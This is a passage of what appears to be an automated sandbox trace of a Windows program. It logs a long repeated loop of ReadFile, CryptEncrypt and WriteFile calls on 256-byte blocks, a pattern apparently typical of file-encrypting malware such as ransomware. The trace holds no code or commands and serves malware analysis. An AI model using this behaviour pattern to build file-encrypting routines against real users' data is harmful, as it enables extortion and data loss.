lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.251] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.251] GetLastError () returned 0x0 [0162.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.251] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.251] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.251] GetLastError () returned 0x0 [0162.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.251] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.251] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.251] GetLastError () returned 0x0 [0162.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.251] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.251] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.251] GetLastError () returned 0x0 [0162.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.251] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.251] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.251] GetLastError () returned 0x0 [0162.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.251] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.251] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.252] GetLastError () returned 0x0 [0162.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.252] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.252] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.252] GetLastError () returned 0x0 [0162.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.252] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.252] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.252] GetLastError () returned 0x0 [0162.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.252] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.252] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.252] GetLastError () returned 0x0 [0162.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.252] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.252] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.252] GetLastError () returned 0x0 [0162.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.252] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.252] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.252] GetLastError () returned 0x0 [0162.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.252] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.253] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.253] GetLastError () returned 0x0 [0162.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.253] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.253] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.253] GetLastError () returned 0x0 [0162.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.253] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.253] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.253] GetLastError () returned 0x0 [0162.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.253] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.253] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.253] GetLastError () returned 0x0 [0162.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.253] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.253] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.253] GetLastError () returned 0x0 [0162.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.253] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.253] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.253] GetLastError () returned 0x0 [0162.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.253] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.253] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.253] GetLastError () returned 0x0 [0162.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.254] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.254] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.254] GetLastError () returned 0x0 [0162.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.254] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.254] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.254] GetLastError () returned 0x0 [0162.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.254] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.254] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.254] GetLastError () returned 0x0 [0162.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.254] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.254] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.254] GetLastError () returned 0x0 [0162.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.254] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.254] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.254] GetLastError () returned 0x0 [0162.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.254] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.254] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.254] GetLastError () returned 0x0 [0162.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.254] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.255] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.255] GetLastError () returned 0x0 [0162.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.255] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.255] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.255] GetLastError () returned 0x0 [0162.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.255] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.255] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.255] GetLastError () returned 0x0 [0162.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.255] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.255] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.255] GetLastError () returned 0x0 [0162.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.255] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.255] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.255] GetLastError () returned 0x0 [0162.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.256] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.256] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.256] GetLastError () returned 0x0 [0162.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.256] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.256] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.256] GetLastError () returned 0x0 [0162.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.256] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.256] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.256] GetLastError () returned 0x0 [0162.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.256] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.256] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, 